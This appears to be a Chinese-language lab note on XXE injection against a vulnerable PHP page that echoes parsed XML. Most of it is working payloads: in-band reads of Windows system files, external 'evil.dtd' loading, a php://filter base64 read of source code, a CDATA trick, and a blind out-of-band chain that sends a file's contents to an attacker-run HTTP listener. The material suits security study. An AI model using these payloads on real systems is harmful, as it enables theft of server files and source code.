<?php
$xmlfile = file_get_contents('php://input');
$creds=simplexml_load_string($xmlfile);
echo $creds;
?>
1 回顯的類型
1.1
POC:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE creds [
<!ENTITY goodies SYSTEM "file:///c:/windows/system.ini"> ]>
<creds>&goodies;</creds>
1.2
與1.1不一樣的是,引入的外部的dtd
POC:
**********
post提交的數據:
<?xml version="1.0"?>
<!DOCTYPE creds SYSTEM "http://127.0.0.1/test/evil.dtd">
<creds>&b;</creds>
**********
http://127.0.0.1/test/evil.dtd的數據
<!ENTITY b SYSTEM "file:///c:/windows/system.ini">
1.3
********
post:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE creds [
<!ENTITY % goodies SYSTEM "http://127.0.0.1/test/evil.dtd">
%goodies;
]>
<creds>&b;</creds>
********
evil.dtd
<!ENTITY b SYSTEM "file:///c:/windows/system.ini">
1.4
| 當里面含有<,&時候,上邊的方法用file協議讀不出文件 |
1.41
如果是php的話,可以用php的filter協議直接讀出文件
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE creds [
<!ENTITY goodies SYSTEM "php://filter/read=convert.base64-encode/resource=index.php"> ]>
<creds>&goodies;</creds>
1.42
"和 “ 拼接引用的內容,就可以正常輸出
**********
post提交的數據:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE roottag [
<!ENTITY % start "<![CDATA[">
<!ENTITY % goodies SYSTEM "file:///C:/softeware/phpstudy/PHPTutorial/WWW/test/index.php">
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://127.0.0.1/test/evil.dtd">
%dtd; ]>
<roottag>&all;</roottag>
*********
evil.dtd的內容
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY all "%start;%goodies;%end;">
2 無回顯
2.1
**********
post:
<!DOCTYPE convert [
<!ENTITY % remote SYSTEM "http://127.0.0.1/test/evil.dtd">
%remote;%int;%send;
]>
**********
evil.dtd的內容
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///c:/test/flag.txt">
<!ENTITY % int "<!ENTITY % send SYSTEM 'http://127.0.0.1:9999?p=%file;'>">
***********
python3 -m http.server 9999
3總結一下自己老出錯的地方
最后引用實體的時候,老忘了打分號。
&goodies; 沒有回顯的時候,要注意用filter結合file的絕對路徑
filter可以不用絕對路徑,但是有時候你是訪問你的index.html,php文件不一定是index.php。
靶場練習;